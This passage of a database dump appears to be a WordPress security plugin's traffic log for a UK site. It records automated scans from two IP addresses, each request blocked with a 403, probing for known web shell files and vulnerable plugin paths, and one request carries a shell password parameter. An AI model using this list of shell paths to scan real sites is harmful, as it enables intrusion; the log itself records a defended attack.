//dailyjolly.co.uk/indoxploit.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','VbgxHY2hT8tI4foS6szwZmaO',0,1673922322.8930,276,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','cguA9XviJzNtG2Vq5nxbojUH',0,1673922324.4386,193,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wordpress/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','zYASRZXk4VWo08y1fxnEQa3D',0,1673922325.9341,193,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/site/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','ZSHl32VkLmrbiXochqwKNeyO',0,1673922327.3634,349,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','KdQpEHIk8wDcmeBJZyhF79Cr',0,1673922330.1848,281,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','dL6e9BazvfJAghwTutb8iWZr',0,1673922331.9534,258,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wordpress/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','MjdE0mVqKvl1zNpTUYFto3S6',0,1673922333.5812,273,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/blog/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','tWlirPQ49SV6ehoxscvOnjy8',0,1673922335.0836,343,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','dDg8yuvojTbSJtWkBC1wElZX',0,1673922336.6582,523,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','vizCdLoVm2sbnRGW13FMSg5r',0,1673922338.4515,324,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/alfa4.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Zq5Alpbd8WNOUY7H43ogFcPv',0,1673922339.9738,245,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/dz.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','0nvHX4sYFOlEwWPZmopK7TAV',0,1673922341.4617,244,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','uaEGf1rlBhqdzFZDnxXNy04v',0,1673922343.0122,200,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','URwEVxCyQZjiBrnd0oF8uabO',0,1673922343.2554,279,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/sells.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','jxWlniHF6kJVhgpefAGcXwy7',0,1673922344.4470,172,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/info.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','wrO4hfLdBtvl2aXYTHpIDVeM',0,1673922345.8774,206,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','JPiVQOH29eYlIxdmfKtUGg47',0,1673922347.3117,171,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-admin/fw.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','PAXUWsbaOMKnrCIxE6ydZ5VN',0,1673922348.7089,247,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','6n09yfAMluhVQs8avCiwJUbd',0,1673922350.1747,212,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-includes/fw.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','mNHFnxi5M9Z2Pa3Y0kfCW8gE',0,1673922351.6563,216,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-admin/wso.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','gNbvrnGSqpfJF5d4ZxzIVDPc',0,1673922355.2491,224,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/wso.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','MIinzKwFCSVY54kc8NLDEuB6',0,1673922356.7444,259,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-includes/wso.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','KW8JEuqBC0ISbPca3VMxgpft',0,1673922358.2500,239,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','C40nxsQAbSf6udUc2poaqX5r',0,1673922359.7096,411,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/Alfa.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','UWZ59RfnIKwtHlT87mkYQ3dA',0,1673922361.3762,906,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','1XMbFv0yk5SZtNxV8BPOHlf7',0,1673922363.9147,913,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','M39btpZlRXa7GoBQeOC4fFwr',0,1673922367.1011,1539,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','8XKC4flzEx7QguRyckJMei9T',0,1673922370.6757,1049,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','gmRn50JXL7GbrICwOs6hljxc',0,1673922373.0721,253,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Oq3scHGXEbvF6olmMZ895TAK',0,1673922374.5568,236,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','5HV4DCWg7jSkneav9TqXRQl8',0,1673922376.0005,188,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','3LYx7zfE6yjQZcDRTHduBGnS',0,1673922377.5134,239,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/uploads/F0x.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','IJHbmMVcxD2ivqBuGzfnotFp',0,1673922379.0455,236,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','jnUTpOEMZR52Fl8mHbVXIK96',0,1673922380.5470,245,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-22.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','IuSk16GQa972xwjRpmDbgAlc',0,1673922382.0138,294,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','KS9WJ1edTBUR0jGDsEq2Xonm',0,1673922383.5422,276,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','jzmcYGENfue70p2CxlUabDBg',0,1673922385.1237,207,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','3EAit6XCmaGMjgHYLPzbd8No',0,1673922386.5527,217,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/admin.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','BDXtsCE1d2598vIbzilN7xfU',0,1673922387.9547,241,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','OmsX9YKZRuaxlpWcMwPvhkn7',0,1673922389.4261,303,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Q4GF1MvzKwgDy5A7cRBsHbPL',0,1673922390.9243,239,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','GcRvjhKzVyb4A3LrfW9X012i',0,1673922392.4057,232,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','XAoQJM28RWs4tklpCVEayiBK',0,1673922394.0308,205,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','AOXGrxbM7YVlvB2SZcHKtkFe',0,1673922395.5707,237,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','U6k5AirzJcThRe8ymxDbWCYI',0,1673922397.1598,183,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/indo.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','VgQDHKCdbzIiA0lZt6wBx3L8',0,1673922398.5919,226,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','n0sdP5KAGacObxpHNZf6RMqm',0,1673922400.0268,230,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-2018.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','kg0P2AXMDeT4LHpqR9ZBzbrm',0,1673922401.5258,190,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-2019.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','mioFdH5J36XG8btKIWvaCupV',0,1673922402.9377,197,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-2020.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','6SYQiGnaoyChZ5ksLI4l9jxp',0,1673922404.3359,196,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-2021.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','2Tgt4RaFofXZzQwAq5L0venu',0,1673922405.7568,202,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-2022.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','YeXpIdfkmqjANPEKohx09Lvr',0,1673922407.1815,225,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-2023.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','jm4D3SMOYPTVAslaEh6rHbKd',0,1673922408.6261,191,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','mrO1DUVPdGX5LKcH2T9lyBCS',0,1673922410.0707,273,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','a0q9TsReZVumvhdBQwYWNLKC',0,1673922411.6243,179,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','PtmYlFr9yRAeIhSvosp0u57Z',0,1673922413.0456,190,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/upload.php?mr=exe3','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','NCtJmkDZW0jGuced2MVBHPF7',0,1673922414.4944,258,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/0z.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','vkMLiK67DqejHC0SfcsumV9E',0,1673922415.9813,376,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Q5OLmWwn8uzi7YPpkKXU4qEF',0,1673922417.6802,243,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/indosec.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','z5FSmYhy60ACeNfap71TlOU3',0,1673922419.1295,243,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','3n8kiSR04lNDdXofHqWxag6E',0,1673922420.5600,236,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/index.php?3x=3x','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','uHUBrKJLyNCOqQ9gbwG2o061',0,1673922422.1082,195,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','1PnJbpWMwcxgemT9As8E7iQU',0,1673922423.5718,290,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','2MPBsLJvxRd1cbVFhXGwUZ47',0,1673922432.0321,183,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','sOcxm1jqeu9VwItpvB0JMAkb',0,1673922439.4338,688,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','XdxWkefG2Kg9cynL6OhiEQTq',0,1673922447.3933,282,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wordpress/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','x7ENbnUCsOuTADXm6BLpfh9z',0,1673922454.5510,294,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/site/ALFA_DATA/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','YjFL5cVwJu69kgTiXAePWn01',0,1673922462.0359,223,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/site/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','aUsnKiPoxrzTDGdR0teF5NZ2',0,1673922469.2633,300,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','vt2XEfMVJp3hB1a5yALsiNwK',0,1673922476.5066,240,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','GpXl0g5TPkyAFBrchoVOUx6H',0,1673922484.4544,235,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Qxc0Ai9KOuEdrnohkDJRI1lZ',0,1673922494.1453,178,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-includes/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','wy5DpeU3sE4mJOBNz1CkvrKL',0,1673922501.2247,256,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp/wp-includes/ALFA_DATA/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','wutNszD7riHQnE6o49KZyfhP',0,1673922508.2352,254,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp/wp-includes/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','QKisHxty1pCbdZaqfuwXN8jW',0,1673922515.5960,303,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wordpress/wp-includes/ALFA_DATA/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','4PWqzFKjawMfeoGUDsxlvbO7',0,1673922522.7087,430,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wordpress/wp-includes/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','LtJyOBFNQp4X2ZDYRx7Wlicf',0,1673922530.6552,214,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','arVWY9TvUyO0uMkeHtXl13Nb',0,1673922537.6727,196,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/blog/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 